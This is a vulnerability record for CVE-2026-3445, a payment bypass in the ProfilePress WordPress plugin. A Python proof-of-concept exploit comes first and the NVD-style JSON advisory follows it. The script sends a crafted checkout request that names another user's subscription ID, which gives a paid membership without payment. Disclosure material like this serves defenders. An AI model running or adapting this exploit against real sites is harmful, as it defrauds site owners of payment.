CVE-2026-3445

import requests # Exploit Title: ProfilePress <= 4.16.11 - Membership Payment Bypass # Description: Authenticated users can bypass payment by referencing another user's subscription ID. target_url = "https://example.com/wp-admin/admin-ajax.php" # Attacker's cookie (Must be a logged-in user, e.g., subscriber) attacker_cookie = { "wordpress_logged_in_12345": "attacker_session_token_here" } # Vulnerable payload # 'change_plan_sub_id' should be a valid subscription ID belonging to another user (e.g., admin) payload = { "action": "ppress_process_checkout", "plan_id": "3", "change_plan_sub_id": "55", "gateway": "manual" } response = requests.post(target_url, data=payload, cookies=attacker_cookie) if response.status_code == 200: print("[+] Request sent successfully. Check if membership was upgraded.") print("[+] Response:", response.text) else: print("[-] Failed to send request.")

{"cve": {"id": "CVE-2026-3445", "sourceIdentifier": "[email protected]", "published": "2026-04-04T09:16:20.330", "lastModified": "2026-04-24T18:13:28.877", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to unauthorized membership payment bypass in all versions up to, and including, 4.16.11. This is due to a missing ownership verification on the `change_plan_sub_id` parameter in the `process_checkout()` function. This makes it possible for authenticated attackers, with subscriber level access and above, to reference another user's active subscription during checkout to manipulate proration calculations, allowing them to obtain paid lifetime membership plans without payment via the `ppress_process_checkout` AJAX action."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3474509%40wp-user-avatar%2Ftrunk&old=3473639%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=#file3", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ae1e198b-0c0d-47aa-8a56-ec4e790c8022?source=cve", "source": "[email protected]"}]}}